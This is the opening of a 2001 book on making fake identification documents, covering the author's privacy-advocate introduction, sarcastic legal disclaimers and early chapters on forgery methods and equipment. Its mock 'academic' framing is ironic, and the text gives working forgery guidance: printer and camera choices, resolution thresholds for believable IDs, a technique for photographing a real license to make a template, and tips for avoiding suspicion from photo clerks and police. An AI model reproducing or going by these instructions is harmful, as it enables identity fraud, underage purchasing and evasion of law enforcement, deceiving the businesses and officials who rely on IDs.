Modern Identity Changer +Secrets of a Back-Alley ID Man: +Fake ID Construction Techniques of the Underground +by Sheldon Charrett +Copyright © 2001 by Sheldon Charrett +ISBN 1-58160-268-5 +Printed in the United States of America +Published by Paladin Press, a division of +Paladin Enterprises, Inc. +Gunbarrel Tech Center +7077 Winchester Circle +Boulder, Colorado 80301 USA ++ 1.303.443.7250 +Direct inquiries and/or orders to the above address. +PALADIN. PALADIN PRESS, and the "horse head" design +are trademarks belonging to Paladin Enterprises and +registered in United States Patent and Trademark Office. +All rights reserved. Except for use in a review, no +portion of this book may be reproduced in any form +without the express written permission of the publisher. +Neither the author nor the publisher assumes +any responsibility for the use or misuse of +information contained in this book. +Visit our Web site at: www.paladin-press.com + +Table of Contents +Introduction 7 +Section One: METHODOLOGY, TOOLS, AND MATERIALS +Chapter 1: Understanding the Two Basic Approaches to Document Forgery 9 +Chapter 2: Tools and Materials of the Back-Alley ID Man 11 +Section Two: DOCUMENT SECURITY +Chapter 3: Getting a Grip on Lamination 23 +Chapter 4: Holograms 31 +Chapter 5; Embossed Seals and Other Fun Stuff 43 +Section Three: PUTTING IT ALL TOGETHER +Chapter 6: Birth Certificates Made Easy 53 +Chapter 7: How Crooks Construct Kick-Ass Driver's Licenses 61 +Conclusion 85 +Appendix A: Contacting the Author 87 +V + +SECRETS OF A BACK-ALLEY ID MAN +ACKNOWLEDGEMENTS +I wish to acknowledge the following individuals for their contributions to this work. In no particu- +lar order, I extend thanks to the following: +• Shane McAndrews. He knows why. +• Pauline. She knows why. +• Jane Smith, For sharing all her informative tidbits and thought experiments and for printing +out my PVC templates. Thanks for the Joyride. +• Bill P. For his invaluable information on PVC card construction and diffractive films. Thanks +for the templates. +• SwitcherX. For hooking me up. +• George. For his boldness in getting the discussion forum under way. +• Peder.Jon, and the Paladin gang. For 30 years of carrying the torch, publishing books on con- +troversial subjects so ordinary citizens could share this information. For continuing to carry +the torch on all subjects not yet banned by our government. +• What's left of the First Amendment to the Constitution of the United States of America. +Thanks for hanging in there, First Amendment. You've taken a beating in recent years. Yet, +though you are dazed, confused, and barely able to keep your balance, you are somehow still +standing. I will miss you when you are gone. +VI + +SECRETS OF A BACK-ALLEY ID MAN +WARNING +This book is intended as an academic study of how criminals break the law by making false identi- +fication documents. There are experiments in this book where step-by-step instructions are given to +show exactly how this is done. Some of the experiments show how government documents are forged. +The creation or possession of such a document is illegal. Furthermore, the possession of any tool to +make such a document is also illegal. +It is my belief that a novelty ID is legal if you place on its back a sticker containing one of the fol- +lowing phrases: +• Not a government document +• Novelty ID only +This is only my opinion, and I'm not a lawyer. It is your responsibility to research the laws in the +state and municipality you live in and to comply with them. If you have any doubts, consult a lawyer. +Even if my opinion is correct, a law may be passed after this book is printed that makes it illegal to +even think about making an ID—novelty or not. Therefore, I must advise you to seek legal counsel +before thinking about creating any ID—real or fake. The penalties for ignoring this warning are very +severe, and include hefty fines and lengthy imprisonment. Thought crime penalties imposed as such +laws are passed maybe even more severe. +Big Brother is watching you! +ADDITIONAL WARNING TO ANYBODY READING THIS AFTER THE YEAR 2100 +It is the author's firm belief that this book will be illegal by the year 2100. If you are reading this +after the year 2100, you should take it to the nearest book-burning center and ask the clerk there if it +is okay for you to read it. We do not offer refunds for any book that is confiscated or burned by the +government. Sorry, no exceptions. +ATTENTION MINORS (CITIZENS UNDER 21 YEARS OF AGE) +The ID examples shown in this book will not enable you to purchase alcoholic beverages. +VII + +SECRETS OF A BACK-ALLEY ID MAN +DEFINITIONS +There are certain terms used in this book best defined in advance to ensure that we are both +speaking the same language. For clarity T have defined them here. +composite photo ID: You get this type of ID when a registry clerk inserts an information card +you've filled out into a special camera and takes your picture. After your waiting a few minutes, +the clerk hands you a license with your picture and information all on the same laminated +card. As you'll see later, there's a way to make composite photo ID without a special camera. +ID card: The actual card, paper, or film that contains identifying information., before it is laminated. +lamina: A single layer of lamination. +target state: The state whose ID you are trying to copy. +template: When used in a computer context, the template is a JPEG or PhotoShop image of a driv- +er's license or other ID. A template is also a hand-drafted or computer-generated ID card that +serves as the base document in a composite photo ID. The base document is overlaid with a +head shot and security transparency, and all three layers are "shot down" into a single ID card. +vital statistics: Vital stats are the bits of information, such as weight, eye color, and birth date +entered onto an ID card. +YOU: The word "you" when used in this book means you in general, not you the person reading +this book. At no time should you (yes, this time I mean you) take the word "you," when used in +a sentence describing illegal activity, to mean you as in you the person reading this right now +(yes, I still mean you, but later on I won't mean you. Okay?). I'll just mean you in general— +humans—whatever. The point is I'm not telling you (yes, you) to do anything illegal, but sen- +tences just sound so much better when writers can liberally use the word "you" without fear +that someday a law will be passed banning its use if it is used to tell you (you) to do something +that Big Brother doesn't like you (I mean you) to do. Okay, so from this point forward, begin- +ning with the next sentence, that is, "you" just means you in general and not you, you. +You got that, you? +VIII + +Introduction +Got ID? No? Then you can forget about cashing checks, renting cars, staying at hotels, picking up +certified mail, renting a P.O. box or mail drop, getting a fishing license, obtaining a professional +license, going to school, getting married, securing a loan, procuring credit, buying a home, insuring +yourself or your property, purchasing a gun, renting videos, getting a job, or starting a business . . . +among other things. +So what? Most people have ID, right? Right. Sure, plop down your ID to rent a car and then check +your mailbox the following week. You'll find ads from every car rental agent in your area, applications +for auto loans, and requests for charitable contributions, among other uninvited intrusions into your +personal affairs and habits. +Then try to sit down and eat your dinner. You'll note a distinctive ringing sound coming from a +certain white box hanging on your wall. Answer it. Guess who? It's the IRS telling you your lifestyle +exceeds your income. You're being audited. It seems a gas station attendant should not be able to +afford the frivolity of renting a car. +Past debts? Use your ID to open a P.O. box and then go home and wait for the bill collectors to +call. Then try to sleep. You'll note a distinctive rapping on the large, wooden, rectangular panel secur- +ing egress to your front walkway. You open the door. Guess what? It's the sheriff's department. Who's +standing behind the sheriff? A representative of U.O. Repo Depot asking for your car keys. +But you're a stand-up citizen? Good. You can rest in the comfort of knowing your state-issued ID +entitles you to the automatic entry of your name and personal information in more than 10,000 gov- +ernment and corporate databases. You'll feel secure knowing that if you ever step out of line, the feds +will find you faster than you can say "D.B. Cooper." and you'll have the privilege of paying your debt to +society all the sooner. + +SECRETS OF A BACK-ALLEY ID MAN +So what can you do? Nothing. Some people use fake IDs, but unfortunately they are illegal, so +(here's not a goddamned thing you can do about the fact that you are merely a number in the system's +supercomputers—subject to its whims, errors, and omissions for the rest of your pushed, filed, +stamped, indexed, briefed, debriefed, and numbered existence. +But since there is a nasty element out there whose members, despite the good law, continue to +manufacture and use fake IDs. I have decided to write a book about how those good-for-nothing, anti- +social, just-hafta-go-t.heir-own-way, subversive bastards go about it—just in case you'd like to know for +your own information. +WHAT THIS BOOK WILL DO FOR YOU +This book will teach you how subversive bastards make identification cards. You will learn about +the following: +• Printers, scanners, cameras, software, and other equipment crooks used to make fake IDs +• How pugnacious punks use the latest equipment as well as the old standbys +' Groundbreaking research in hologram reproduction and how hoodwinking hoodlums use this +information when constructing fake IDs +• How unchivalrous sharks make IDs from computer templates +• How Filthy-fingered Filchers create composite IDs with a standard 35mm camera +• Various ways bellicose bandits fake notary, corporate, city, and state seals +• Where criminals get away with cutting comers and where they don't +Some naughty people have ID dreams deeper than their pockets. Therefore, I will share with you +many "poor man's" techniques that such nasties use to make professional-looking IDs. Some licentious +lechers decide that making IDs is too much work. I'll show you where they buy IDs so you can make +sure to stay the hell away from such evil places. +WHO IN HELL AM I, AND WHAT DO I KNOW ABOUT MAKING ID? +I am the state's worst nightmare: a licensed private detective who is also a staunch privacy advocate +and freedom fighter. While private detectives are typically thought of as privacy invaders as opposed to +preservers, most of my cases are aimed at the system. I won my detective license after suing the system +for trying to keep it from me. +Over the years I've investigated corrupt cops, dirty politicians, overzealous condo board presidents, +and a host of other creeps who deserved what they got. What better way to maintain privacy than by +exposing the private lives of politicians who introduce privacy-restricting bills into the legislature? +But it takes a long time to fight the system, and I don't expect to see a truly private world in my +lifetime. Many of my clients have felt the same. Even though the feds like to think of ID forgers as +lowlife subversive scum, there are privacy seekers in the world who have found good uses for fake IDs. +It has become necessary for privacy seekers to create new identities to shield themselves from the bar- +rage of intrusive bureaucracies and their endless need to know every facet of our existence. +One aspect of maintaining such identities is the use of novelty identification, also known as "fake +ID." If you've read my book The Modern Identity Changer, then you know I've helped many people disap- +pear over the years. Although most of my clients end up with new state-issued documents, they've had +to conquer a great many hurdles along the way to getting them. Usually, conquering such hurdles is +facilitated by the use of false identification. Since it's dangerous for a disappearing client to use the +services of a back-alley ID man, oftentimes I had to make IDs for my clients. + +INTRODUCTION +I still have the first ID I ever)' made for a client. It sucked. It was an employment ID that my client +used to open a bank account in his new name. Even though the ID was laughable—even I still get a +good chuckle today when I look at it—the bank rep simply said, "I'll have to make a copy of this." +Then she opened the account. Purpose served. +Then came the desktop computer revolution. An apparent boon for document forgers, but in +truth, and as you will see, it was the worst thing that could have happened for privacy seekers. But, jo, I +was just one man, and one man cannot stanch the rush of progressing technology. I had to ride the +dragon. Reluctandy, I learned about computers. I learned programming: BASIC, C, then C++, and +now HTML and JavaScript. I learned graphical user interfaces (GUIs) and object-oriented program- +ming, learned to master computer-aided design (CAD) programs, word processors, and graphics soft- +ware. I was faithful and stayed on top of all the bugs and reengineering, all the mergers and takeovers, +even as I screamed inside knowing all along what would happen. +And it happened. +It's happening now. Too many people are using desktop computer technology to make IDs and +even to counterfeit money. Now the feds are making IDs harder than ever to reproduce, and, as +you may have noticed, the almighty buck is being redesigned to thwart modern desktop counter- +feiters. The system is introducing counterfeit-resistant security devices—ones that are not readily +replicated by commercial desktop computers and accessories. Holograms and magnetic swipe +cards are two examples. As you'll learn, there are still ways to make holograms and magnetic +swipes, but I fear for the future. This may be the last book ever to show how state identification +cards can be economically reproduced. +Even though the very first ID I ever made was completely awful, I'm thankful that I've refined my +technique over the years. Today I am very proud of the IDs I make: they are rarely questioned. +I tell you this only so you'll understand where my knowledge came from. I do not intend to pro- +mote the use of fake ID in this book, whether for privacy protection purposes or otherwise. I've +already written two hooks promoting the use of fake ID for privacy purposes, and I do not intend to +write any more about this subject. Why? Because limes are changing, folks. I fully believe we are mov- +ing into an era of book banning. There are already books in this country that are effectively banned +because some bad court decisions have left publishers open to crushing lawsuits. Frankly, I don't want +to have to rewrite this book after our brain-dead reps in Congress decide to go the way of Australia +and other countries that literally maintain lists of banned books. That's why this book is written as an +expose of a certain criminal element in our degraded society. As such, it should be one of the last to +be banned. If you have concerns about book banning, please make your congressional representative +aware of them. It is unlikely that your rep will have original concerns of his or her own: such requires +actual thought. +Now that you know who I am, how I got to know what I know, and what I'm going to teach you, +let's talk about who you are, who you shouldn't be, and what you better not learn. +WHO ARE YOU, AND WHAT'RE 'YA TRYIN' TO PULL? +If you are a minor thinking about using the methods in this book to purchase alcoholic beverages, +think again. First of all, let me just remind you that this book is for academic study only! Using the tech- +niques discussed here to pull a fast one on the state will get you in deep shit. When you get caught +(and you will), you may lose your driving privileges. You will probably give up any shot, at getting into a +decent college; you will never become an attorney, a doctor, or a professional deserving public trust. +You will destroy any political aspirations you may have because the press will look up your conviction +(and you will be convicted) and tell the whole world about it. Besides, alcohol will RUIN YOUR LIFE. +Take it from one who knows. If I hadn't spent 16 years at the bottom of a shot glass, I'd be a million- + +SECRETS OF A BACK-ALLEY ID MAN +aire by now. Alcohol saps your motivation, drains your ambition, and makes you hate the world—not +to mention the devastating physical consequences, which, by the way, are IRREVERSIBLE. To wit: liver +damage and loss of brain cells—both, I'll repeat, IRREVERSIBLE! You will gain a better, more power- +ful perspective on life if you hang back and drink soda water at the parties you attend. Watch how all +the drunks make fools of themselves. You will eventually notice someone of the opposite sex—or same +sex if that is your preference—who is also drinking soda water. My advice: hang with that person. Go +to movies, walk along the beach, take long drives in the country, or curl up on the couch with nachos +and a video. You will find these things infinitely more rewarding than sitting around pouring poison +into your gut and talking in incomplete cliches until you puke. Okay? Enough said. +ADDITIONAL NOTE TO MINORS +Just in case the foregoing meant nothing to you, I must give you fair warning. Since this is a book +for informational purposes only, the driver's license templates I've chosen are the most commonly forged +documents in the United States. Therefore, they are completely useless for alcohol-related purposes. +For example, there are so many fake New Jersey IDs out there that many liquor store owners and bar +bouncers no longer accept the legitimate New Jersey license as proof of age. The few who do accept +them have become experts at detecting fakes. In short, any attempt to use the template-based IDs in +this book for illicit purposes will more than likely get you caught. If you think I'm just saying this to +cover my ass, check out what the Internet has to say about the New Jersey and other popular IDs. They +are useless for purchasing alcohol. +HOW TO USE THIS BOOK +You can't. Using this book is illegal. If you have a problem with this, speak to your congressional +representative and then hold your breath. You may study the pictures, learn how good-for-nothing bas- +tards make IDs in the back alleys of good ol' U.S. of A., and maybe—-just maybe—make one or two +"novelty" IDs yourself, which at least at the moment, I don't think would be too illegal. But don't +quote me on that. The laws are subject to change at the whims of rich people, who, for the most part, +are born into their roles and have little idea of the impact of their legislation, much less the intellect +to comprehend the hell that will result from it. +BUT AREN'T THERE LEGITIMATE USES FOR FAKE ID? +Aren't you listening? It doesn't matter. The government has spoken. Fake ID of any kind is mala pro- +hibita. It's a no-no 'cuz our government says so. It doesn't matter how you plan to use it. It doesn't mat- +ter what horrible situation you need to escape from. Nor does the government give a shit about any +unalienable rights you think you were born with. That's all out the window now that we have gone the +way George Orwell told us in 1984. +But My State DMV Sold My Current Address to My Ex-Husband, +Who Has Repeatedly Threatened to Kill Me and My Children! +That's not an excuse to use fake ID. Under the current law, you have to allow your ex-husband to +kill you and your children. What's a few dead kids compared to the sacred laws that are the pillars of +our great society? How can you even begin to compare children—who are usually under 4 feet tall—to +the great pillars, typically imagined by patriots to be well over 200 feet tall? That's at least a 196-foot dif- +ference. What's wrong with you? + +INTRODUCTION +But My Credit Profile Has Been Crossed with a Deadbeat's Whose Name Is Similar to Mine! +Haven't you heard about the pillars? Our government defends us from nuclear attack, biological +devastation, threats of insurrection, attempted coups, serial killers, rapists, and people who live on +ranches. Recently our government has even taken the magnanimous step to protect us from books +with improper information—stuff no good citizen should ever see. How can you be so shallow as to +care about your credit rating? The pillars must be protected. Measly credit mishaps are no excuse for +using fake ID. +But I Inherited a Vicious Criminal Record Due to an National Crime Information +Center Computer Glitch, and the Government Doesn't Believe Me! +The government doesn't believe you because you are lying. If you were telling the truth, your state- +ment would not contradict the omniscient government database. At any rate, it's still not an excuse to +use fake ID. Under the current law, you must allow the government to prosecute you for murder; then +you must participate in the state's capital punishment program. But fear not. Your murder is sanc- +tioned by the state. If you have a choice, go with cyanide gas. Some interesting things happen to your +lungs, muscles, and bones when you inhale cyanide. Make your last experience an intense one. +But What about Camouflage Passports? Why Does the Government +Allow Them? Isn't That a Contradiction? WTF? +Camouflage passports are typically used by inner party delegates traveling to Third World coun- +tries. We must protect the party members at all costs. They know what's best for us. How would we sur- +vive if something happened to them? For these reasons, the government tolerates camouflage pass- +port use by the proletariat. Yes, it contradicts the False Identification Crime Control Act, but just dou- +blethink it. You'll be okay. Big Brother will lead you. +NOW THAT YOU KNOW THE RULES ... +If you make an ID that contains false or misleading information about precisely who in hell you +are, it is probably illegal to take it anywhere beyond your living room. It is definitely illegal to show it +to anybody in an effort to convince that person that you are someone or some age that you, in fact, are +not. Even if your name, address, age, and other vital stats appear correctly on the ID, it is still illegal if +it purports to be issued by any governing body or if it contains a Social Security number—or other +mark of the beast—that is not your true state-issued serial number. If you break the law, you will go to +jail for many years, where you will most likely be raped by inmates and beaten by the guards. The +tricks you are about to learn are performed in this book without mirrors. I do not use safety nets, and +many of these procedures are performed high above the circus floor at dangerous speeds. In short: do +not try this at home. + +Section One +METHODOLOGY, TOOLS, +AND MATERIALS + +Chapter 1 +Understanding the Two +Basic Approaches +to Document Forgery +There are two basic approaches that hooligans use to make fake IDs. I'll introduce both here so +that you can get a taste of each. You might decide that an academic study of both techniques quench- +es your curiosity. Conversely, you may become partial to one or the other of them, and decide to focus +your learning. Either way, their explanation will aid your understanding of upcoming chapters and the +general layout of this book. +THE NEW SCHOOL (USING MODERN TECHNOLOGY) +The feds are learning that malcontents and sociopathic monsters use home computers to commit +the horrendous crime of counterfeiting identity documents. The home computer process involves +making or obtaining a digital copy or template of a real ID, such as a driver's license. The hoodlum +then uses his personal computer to alter the template. This usually involves digitally pasting a recent +self-portrait onto the template, accompanied by appropriate identifying information and whatever +name, birth date, and Social Security number he desires. +The self-portrait is scanned into the computer or downloaded from a digital camera. All template +editing is done by sophisticated graphics software, which neatly handles bleeds, screens, and overlap- +ping text often used to secure the ID. The end result is sent to a high-resolution desktop color printer. +Special security devices known as holograms can also be printed with a desktop printer. The holo- +gram can be printed directly onto the template, onto a special transparency sheet, or directly onto the +laminated ID. + +SECRETS OF A BACK-ALLEY ID MAN +THE OLD SCHOOL +Psychopaths and mental defectives of the old school make fake IDs using basic art skills and old- +fashioned (nondigital) photography. They steal templates or make them from scratch and then use an +appropriate typewriter to enter whatever information they'd like. They use an actual passport photo- +graph and create overlaps with transparency sheets. +Once the template is ready, it is then "shot down" with a 35mm camera to create a one-piece ID +card. For some applications, "old-school" results can be superior to modern technology. +AND WHERE THE TWAIN SHALL MEET +There are certain things common to both methods. Once a template is printed—either by com- +puter or at the local pharmacy—crooks need to trim it, add a backing, add a hologram, and laminate. +There are other times when naughty people commingle modern technology with old-school meth- +ods. Let's say a certain felon has plenty of photography equipment but no artistic skill. Well, rather +than draw a template, he might wish to design one using the local library's computer. Voila! New +school meets old. For desperate criminals it's whatever works. +Now let's examine some ID-making tools and materials, new school and old. +10 + +Chapter 2 +Tools and Materials +of the Back-Alley +ID Man +This chapter introduces the tools and materials I used to make the IDs described and depicted in +this book. I briefly describe why a particular tool was chosen and show where bad people purchase +such egregious contraband. Details of how depraved degenerates use each tool will come later. +It is by no means required that all these tools be purchased to make IDs. The casual reader can +make an academic study of ID forgery with a minimal cash outlay. In fact, you may already own every- +thing needed to perform some modest experiments in this art. +Nor is it required that the exact tools I use be purchased. You may already own or have access to +substantially equivalent tools and materials to get the job done. With some minor alterations to the +procedures presented later, you should be able to use substitutes with a minimum of fuss. After all, +"take a picture" means the same thing whether you're using an old Sears KS-1 like yours truly or a top- +of-the line 10-megapixel digital camera; laminate means the same thing whether you're using Kinko's +or some peel-and-stick lamination sheets from a Cracker Jack box; print means print. You get the idea. +A WORD ABOUT RESOLUTION +Much of what follows requires an understanding of the term resolution as it relates to computer +monitors, printers, scanners, and digital cameras. If you know this stuff inside out, feel free to skip +ahead. If you've always been confused by the term, this section should help. +Printer manufacturers are always talking about resolution. But what is it? What resolution is high +enough to print IDs? Those are good questions and ones often asked. If you're going to buy equip- +ment to make novelty IDs, you'll need to know the answers. Not only will you need to know about +11 + +SECRETS OF A BACK-ALLEY ID MAN +printer resolution, you'll also need to know how to set the resolution of your computer monitor, deter- +mine the maximum resolution of your digital camera, and calculate the final resolution of the ID tem- +plates you edit. If you don't know what an ID template is, don't worry. We'll get to that too. For now, +let's get a firm handle on resolution. +There are two types of resolution: image and color. +Image Resolution +Image resolution is usually given in dots per inch (dpi). Printers—whether laser, inkjet, or Micro +Dry™— form images with tiny dots of ink or toner. The more dots a printer can squeeze into an inch, +the more detailed the image will be. +Generally speaking, a high-resolution image is one that can trick the brain into thinking it sees a +complete picture rather than a series of dots. Since we are ultimately concerned with printing a believ- +able picture (i.e., an ID card), let's explore exactly what that means. This book's old-school ID meth- +ods use standard photography to accomplish this. Let's begin there. +Photography, literally, means "drawing with light." We, of course, know that we are not making an +exact clone of the object we are photographing—(hat technology is only available in bad science-fic- +tion movies. Rather, we are sampling the light reflected by the object and recording it on film. +Just as an artist looks at his subject and paints a white dot to indicate a highlight, a camera—ana- +log or digital—records what it "sees" as dots of color. +In reality, our eyes see in dots of color. Speaking loosely, the "resolution" of our eyes is billions of +"dots" per square inch. There is no technology that can match the human eye-—not even our best +color print films. But where the eyes can't be fooled, the brain can. The human brain is fairly gullible. +With enough convincing, we can get the brain to believe it sees something it really doesn't. +Two good examples are summertime "puddle" mirages and the large, looming harvest moon we +see—or, rather, think we see—at the beginning of every fall. +In the summertime, direct sunlight heats the asphalt streets to temperatures that most bare feet +can't tolerate. The air just, above the street also becomes heated as evidenced by those waves of heat +we sometimes see coming off the road. But the air several inches above the road is much cooler. This +difference in temperature causes light from just above the horizon to refract, or bend, back up and +away from the pavement. Looking down a long road toward the horizon, our eyes see the blue sky sit- +ting on the road. But the brain doesn't believe it. The brain is not used to seeing the sky on the road. +The brain is used to seeing puddles on the road and does us the favor of making a minor adjustment +to the image so that it fits better with the world we've come to know. Neat, huh? +So what about that moon? Around the autumnal (and, for that matter, the vernal) equinox, the +moon follows a much shallower path along the horizon. It does not get up as high as it does in sum- +mer and winter. Therefore, when the moon rises during these times, it travels just above familiar fore- +ground objects, such as tree lines and rooftops. Because these familiar objects are generally large, our +brain tells us that the moon is also large. Don't believe it? Next time you think you see this "large" +moon, perform this simple experiment. Turn around so that the moon is at your back. Then, bend +over and look at it upside down from between your legs. Because the once familiar foreground objects +are now upside down and no longer familiar, the moon—for a moment—will look the same size it +always does when it is high in the sky. Try it. It works! +Knowing what we now know about our gullible brain, we can see where a photograph only +needs to have enough dots of information to fool our brain into thinking it's seeing something +complete, when, in fact, it is not. Now this is where it begins to get complicated. A newspaper pho- +tograph is a good place to begin understanding this concept. Look at one. Look at it from across +the room and then look at it closely under a bright light. Now look at it real close under a +magnifying glass. +12 + +TOOLS AND MATERIALS OF THE BACK-ALLEY ID MAN +You'll note that from across the room the photograph looks pretty realistic. When it's under a +bright light you begin to get an idea where certain details of the photo are lacking, and under a mag- +nifying glass you will clearly see that the picture is made up of many tiny dots. +A color photograph, such as a snapshot from your recent vacation, is more convincing to the eye. +This is because a standard 35mm color negative contains about 6 million "dots" of information, where- +as the same size newspaper photo only has a few thousand. +The trend in computer periphery is to produce "photo-quality" images and printouts. But what +does that mean? A magazine generally prints its photos at about 200 dpi, and they are considered +photo quality. I'll tell you right now, 200 dpi is definitely not good enough for novelty IDs. One can be +thankful that, even very inexpensive printers today produce at least 600-dpi printouts, which is the +bare minimum for believable IDs.1 +Color Resolution +Color resolution is the number of separate colors your printer, monitor, or other device can dis- +play at the same time. Early printers and monitors were monochrome, which literally means "one +color." Later devices, such as enhanced graphics adaptor (EGA) monitors and color ribbon printers, +were capable of only a few colors. +Today, color resolution is discussed in "bits" of color data. Eight-bit color resolution means +your monitor is capable of producing 256 separate colors at once. This is because computer data +are binary and each bit of information can either be "on" or "off," leaving a total of two possibili- +ties. Two (possibilities) raised to the eighth (number of bits) power equals 256. Sixteen-bit color is +216—totaling 65,536 colors. +All you'll ever really need is 24- or 30-bit color resolution. Anything more than that is just a mar- +keting ploy. Just remember that 224 = 16.7 million colors, which is about as many as the human eye can +distinguish. For this reason, 24-bit color is known as "true color," a term you may have heard in refer- +ence to scanners, printers, and monitors. +It is good that most computer devices manufactured today are true color. When buying a printer, +scanner, or digital camera, make sure that it's marketed as 24-bit, true-color, or 16.7-million-color +device. It's less important to have a true-color monitor, but you will need at least 8-bit (256) color reso- +lution to accurately edit ID templates and to use most of the software we'll be discussing. +Setting Your Monitor's Resolution +You will need to check your system setup to make sure it is set for at least 256 colors and 800 x 600 +screen resolution. On a personal computer running Windows 95, click Start, Settings, Control Panel, +Display, Settings. If you've purchased your computer recently, you should find that everything is in +order or can easily be changed. If the proper options are not available, you will need to select Change +Display Type. If other device drivers are not available, you may need to upgrade your monitor. Contact +your monitor's manufacturer for more information. For preliminary ID work, you may be able to get +by with 16 colors and 640 x 480 display. As you upgrade to more sophisticated software, expect the +installation program to complain about your display setup. +Calculating the Image Resolution of Your Final Printout +Even an Alps Micro Dry (MD) 5000 printer, which prints 2,400 dpi, does you little good if your +original image is only 100 dpi. There are several things you must consider. First, what is the resolu- +tion of the original ID template? If you scanned the template yourself with a 600-dpi scanner, your +final image will never be more than 600 dpi. If you want the full use of your 2,400-dpi printer, you +will need a scanner that scans at 2,400 dpi, or you'll need to find ID templates on the Internet that +are at least 2,400 dpi.2 +13 + +SECRETS OF A BACK-ALLEY ID MAN +Digital camera technology adds a layer of difficulty in calculating the dpi of your final printout. +This is because digital cameras are marketed according to total dots rather than dots per inch. +(When discussing digital cameras, we use the term pixels instead of dots, but for our purposes the +terms are interchangeable.) +To determine a digital photo's resolution, you need to know the target size of your finished prod- +uct. You then divide the target width, measured in inches, by the pixel width of the camera's digital sen- +sor, or CCD. The result is the dpi of the final printout (assuming the printer's resolution is sufficient). +Here is the formula: +CCD /T = dpi +W W +Where CCD is the pixel width of the camera's digital sensor and T is the target's width in inches. +W w +For example, let's say I photograph my kitty cat with my D-340R digital camera. This camera has a +1,280 x 960 CCD. Let's further assume that the picture is perfect and needs no cropping. Therefore, +I'd like to print it in its entirety for use in a 12 x 9-inch picture frame. My CCD , then, is 1,280, and +W +my target width is 12. Calculated out we have 1,280/12 = 106.67 dpi. This is probably sufficient to put +kitty's picture on the fridge but is not acceptable for novelty IDs. Fortunately, novelty IDs are much +smaller, which will yield a much higher resolution. +The astute observer will have noted the calculation for height also yields the same result: 960/9 = +106.67 dpi. In practice, there will be times when your target's dimensions do not have the same ratio +as your camera's CCD, in this case 4/3. When that happens, you will usually have to crop the image so +it fits the dimensions of your target. Provided you do not change the aspect ratio when resizing your +digital images (and you shouldn't), the dpi will be the same for height as it is for width. +Moving On +This section has introduced you to resolution and how it affects the quality of novelty IDs. This +information will help you make informed decisions when shopping for and using the tools of this +trade, assuming you choose to make an academic study of ID forgery. Now let's have a look at some of +my favorite ID-making tools. +FIRST THE BIG STUFF +In choosing tools for this book—at least as far as the expensive stuff was concerned—I had to +somewhat revamp and update my ID construction methods. I wanted to show the tools most often +used by degenerate slimeball counterfeiters, but I also wanted to keep costs down. I'm happy to report +that my compromises were not so gut retching. Here are some tools that will do a good job on your +novelty IDs, but not on your wallet. +Adobe PhotoShop +It wouldn't be fair to go into lengthy explanations of PhotoShop 6.0: purchasing this software +would be cost-prohibitive for most readers. At the time of this writing it was selling for around $700— +ouch! A computer system capable of running the software could easily have doubled that figure and +then some. +Luckily, the two most important PhotoShop features are available in earlier versions of the soft- +ware. PhotoShop 3.0 allows you to render graphics in multiple layers; that's the first important fea- +ture. Second, you can adjust the opacity of each layer, which comes in handy for making holograms +and watermarks. These features are extremely useful to the ID artisan, as you will see in coming +14 + +TOOLS AND MATERIALS OF THE BACK-ALLEY ID MAN +The Olympus D-340R digital camera is the best bang for the buck. +chapters. PhotoShop 3.0 offers a myriad of sophisticated graphic-rendering features in addition to +the nifty ones above. +I was able to purchase a "used" version of PhotoShop 3.0 on eBay3 for $85. Of course, there are +those very few document forgers who are also unscrupulous enough to buy bootleg or "backup" ver- +sions of this (and other) software for around $10 (perish the thought!). Then there are those who can +easily afford PhotoShop 6.0. If you are one of these folks, either unscrupulous or rich, then by all +means enjoy the more sophisticated version of this wonderfully useful software—if it will run on your +computer. Just be advised that the commands referenced in this book are for PhotoShop 3.0. +Olympus D-340R Digital Camera +To make believable IDs, subversive bastards need high-resolution photos of themselves. It ain't +gonna matter a whit if your printer has 2,400-dpi resolution if your original image is only 72 dpi. +Generally speaking, you'll need at least a "megapixel" camera to get consistently professional +results. The D-340R has a resolution of 1,280 x 960 (1.3 megapixels). I think it's the best digital cam- +era in its price range. By the time this goes to print, you might be able to find a used one on the mar- +ket for around $100. Mine cost $300 new in 1999. +The D-340R has two useful functions. First, it's great for taking various self-portraits against different +backgrounds. Many novice identity changers make the mistake of using the same picture on every ID. If +arrested, the cop impounding the novice's wallet will notice this immediately, thereby ruining any +chance of the novice passing himself off as somebody else. The traditional solution was to have several +passport photos taken in different clothing and hairstyles. Though this is still an option, digital self-por- +15 + +SECRETS OF A BACK-ALLEY ID MAN +traits offer greater flexibility. What if you need a backdrop color other than blue? This may indeed be +required for matching various state, university, and corporate ID cards. In the past, ID forgers had to +bring their own backdrop to the camera studio (which might arouse suspicion) or do their own pho- +tography at home and hope for a good picture. Both are costly and time-consuming processes. +Since most ID photos are just a few square centimeters in size, a printed image taken with a D-340R +(or comparable camera) easily meets our minimum 600-dpi standard (see under "A Word about +Resolution" above). Today, counterfeiters can make their own ID photos quickly and effectively at home. +By doing so, they eliminate exposure (no pun intended) to passport photographers and film developers, +who may become suspicious and alert authorities to the odd behavior they witness. What odd behavior? +A person who for no good reason brings a backdrop to the passport photo studio; an unphotogenic +schmuck who sends in three film rolls of self-portraits; a shaggy dude who shows up wearing his +"Counterfeiters Do It on Printing Presses" T-shirt. Okay, I exaggerate. Chances are the film police don't +care about any of this; they just want your money. But if you should be caught for something (God knows +what) after the fact, you don't want any unusual behavior left fresh in the minds of clerks who are other- +wise desperately bored and would love to impress the authorities with their astute observation abilities. +The D-340R can also be used in a pinch to make ID templates. You can photograph a 2 3/4 x 1 3/4- +inch state license yielding a 465-dpi printout, which may be good enough for some circumstances. +Good-for-nothing son-of-a-bitch document forgers do this by placing the camera on a tripod 4 inches +above a real ID and snapping a picture in macro mode. Using the wide-angle lens at this close range +wall produce a distorted image. The ID's sides, especially the long side, will appear bowed out. The sons- +o'-bitches solve this problem by putting the ID in a vise and closing it slightly so the ID surface becomes +concave (the middle bends down). This compensates for the distortion produced by the camera. +Alps MD-5000 Color Printer +If you've been reading closely, you've probably guessed that I'm in love with the Alps MD-5000. +Technology is progressing fast, and 10 years from now I'll probably look back on my love affair with +the Alps as a mere infatuation. But in today's market there is no comparable printer in its price range. +If you shop around, you can get the printer and dye-sublimation upgrade for under $500 brand +new. At the time of this writing, factory-reconditioned models were available for around $300 with full +warranty. I got mine from buy.com. The printer was $418, and the upgrade kit was $71. Shortly after I +bought it, I saw the printer for $404 from some store in New Jersey (can't remember which). +The printer and upgrade come with all necessary cartridges. But while you're shopping, pick up +the EconoBlack and Gold Metallic cartridges. The EconoBlack will save unnecessary use of your other +cartridges when printing business letters; the Gold Metallic comes in handy for certain types of holo- +grams. You'll also want to throw the following 